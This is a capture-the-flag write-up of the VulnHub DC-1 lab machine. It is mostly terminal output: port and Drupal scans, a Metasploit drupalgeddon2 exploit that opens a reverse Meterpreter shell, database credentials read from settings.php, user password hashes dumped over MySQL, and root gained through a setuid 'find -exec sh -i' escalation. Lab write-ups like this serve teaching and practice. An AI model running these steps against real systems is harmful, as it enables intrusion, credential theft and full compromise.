BACK
root@kalilinux:~/Documents/VulnHub/DC-1#
root@kalilinux:~/Documents/VulnHub/DC-1#
www-data@DC-1:/var/www/sites/default$
www-data@DC-1:/var/www/sites/default$
www-data@DC-1:/var/www/sites/default$
__/\\\\\\\\\\\\___________/\\\\\\\\\____________________/\\\_
_\/\\\////////\\\______/\\\////////_________________/\\\\\\\_
_\/\\\______\//\\\___/\\\/_________________________\/////\\\_
_\/\\\_______\/\\\__/\\\______________/\\\\\\\\\\\_____\/\\\_
_\/\\\_______\/\\\_\/\\\_____________\///////////______\/\\\_
_\/\\\_______\/\\\_\//\\\______________________________\/\\\_
_\/\\\_______/\\\___\///\\\____________________________\/\\\_
_\/\\\\\\\\\\\\/______\////\\\\\\\\\___________________\/\\\_
_\////////////___________\/////////____________________\///_
Target IP: 10.0.2.5
by sc00by
##########
NMAP scan:
##########
root@kalilinux:~/Documents/VulnHub/DC-1# nmap -p- -sT -sV 10.0.2.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-19 09:29 CDT
Nmap scan report for 10.0.2.5
Host is up (0.00086s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
55273/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:02:BA:5C (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.52 seconds
###########
Web Server:
###########
[~!~] Upon visitting http://10.0.2.5 , I see the home
page runs the Drupal CMS.
[~!~] I did some searching for tools I could use to
enumerate this Drupal instance since I had
never come across this before in this scope.
I used a tool called droopescan
root@kalilinux:~/tools/enum/droopescan# droopescan scan drupal -u http://10.0.2.5/ -t 32
[+] Themes found:
seven http://10.0.2.5/themes/seven/
garland http://10.0.2.5/themes/garland/
[+] Possible interesting urls found:
Default admin - http://10.0.2.5/user/login
[+] Possible version(s):
7.22
7.23
7.24
7.25
7.26
[+] Plugins found:
ctools http://10.0.2.5/sites/all/modules/ctools/
http://10.0.2.5/sites/all/modules/ctools/LICENSE.txt
http://10.0.2.5/sites/all/modules/ctools/API.txt
views http://10.0.2.5/sites/all/modules/views/
http://10.0.2.5/sites/all/modules/views/README.txt
http://10.0.2.5/sites/all/modules/views/LICENSE.txt
image http://10.0.2.5/modules/image/
profile http://10.0.2.5/modules/profile/
php http://10.0.2.5/modules/php/
[+] Scan finished (0:09:31.586060 elapsed)
##################
Exploiting Drupal:
##################
root@kalilinux:~/Documents/VulnHub/DC-1# msfconsole
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v5.0.16-dev ]
+ -- --=[ 1876 exploits - 1061 auxiliary - 328 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
msf5 > search drupal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
2 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
3 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
4 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
5 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
6 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
7 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
8 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > show options
Module options (exploit/unix/webapp/drupal_drupalgeddon2):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic (PHP In-Memory)
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 10.0.2.5
RHOSTS => 10.0.2.5
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
[*] Started reverse TCP handler on 10.0.2.15:4444
[*] Sending stage (38247 bytes) to 10.0.2.5
[*] Meterpreter session 1 opened (10.0.2.15:4444 -> 10.0.2.5:39737) at 2019-04-19 10:23:38 -0500
meterpreter >
[~!~] Sometimes it feels like cheating to use Metasploit
but the amount of time that may have saved is
pretty nice
meterpreter > cat flag1.txt
Every good CMS needs a config file - and so do you.
[~!~] flag1.txt was found!!!
We gotta do some config enumeration it seems.
Eventually found in settings.php:
settings.php:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[~!~] There's flag2 AND some database credentials:
database = drupaldb
username = dbuser
password = R0ck3t
############
MySQL Pivot:
############
www-data@DC-1:/var/www/sites/default$ mysql -u dbuser -p
mysql -u dbuser -p
Enter password: R0ck3t
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 4167
Server version: 5.5.60-0+deb7u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
[~!~] Now we have a mysql session! Time to
harvest more data.
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| drupaldb |
+--------------------+
2 rows in set (0.00 sec)
mysql> use drupaldb;
use drupaldb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_drupaldb |
+-----------------------------+
| actions |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_update |
| cache_views |
| cache_views_data |
| comment |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_revision_comment_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_comment_statistics |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| system |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users
|
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
+-----------------------------+
80 rows in set (0.00 sec)
mysql> SELECT * FROM users;
SELECT * FROM users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com | | | NULL | 1550581826 | 1550583852 | 1550582362 | 1 | Australia/Melbourne | | 0 | admin@example.com | b:0; |
| 2 | Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org | | | filtered_html | 1550581952 | 1550582225 | 1550582225 | 1 | Australia/Melbourne | | 0 | fred@example.org | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
3 rows in set (0.00 sec)
mysql> SELECT name, pass FROM users;
SELECT name, pass FROM users;
+-------+---------------------------------------------------------+
| name | pass |
+-------+---------------------------------------------------------+
| | |
| admin
| $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
|
| Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg |
+-------+---------------------------------------------------------+
3 rows in set (0.00 sec)
mysql>
[~!~] I actually got very stuck on this part
with the hashes, I'll come back and
figure this out at some point.
##############
Another angle:
##############
www-data@DC-1:/var/www/sites/default$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
[~!~] I forgot to check for setuid files
earlier on so I went back to check
some of the more default angles.
From 'man find':
-exec command ;
Execute command; true if 0 status is returned. All following arguments to find are taken to be arguments to the command until an argument consisting of
`;' is encountered. The string `{}' is replaced by the current file name being processed everywhere it occurs in the arguments to the command, not just
in arguments where it is alone, as in some versions of find. Both of these constructions might need to be escaped (with a `\') or quoted to protect them
from expansion by the shell. See the EXAMPLES section for examples of the use of the -exec option. The specified command is run once for each matched
file. The command is executed in the starting directory. There are unavoidable security problems surrounding use of the -exec action; you should use the
-execdir option instead.
[~!~] Elevated command execution?
#####
ROOT:
#####
www-data@DC-1:/var/www/sites/default$ find /home -exec sh -i \;
find /home -exec sh -i \;
# whoami
whoami
root
[~!~] What just happened? That's it?
Well what happened was that since
we have the setuid bit for
/usr/bin/find, as soon as we run
it we can break out with privesc!
We broke out from using the -exec
flag to specify the command we want
to run, which in our case is just
a shell with 'sh -i'.
Now to get the flag...
# cd /root
cd /root
# ls
ls
thefinalflag.txt
# cat thefinalflag.txt
cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
#
[~!~] THAT's A WIN :D
sc00by
BACK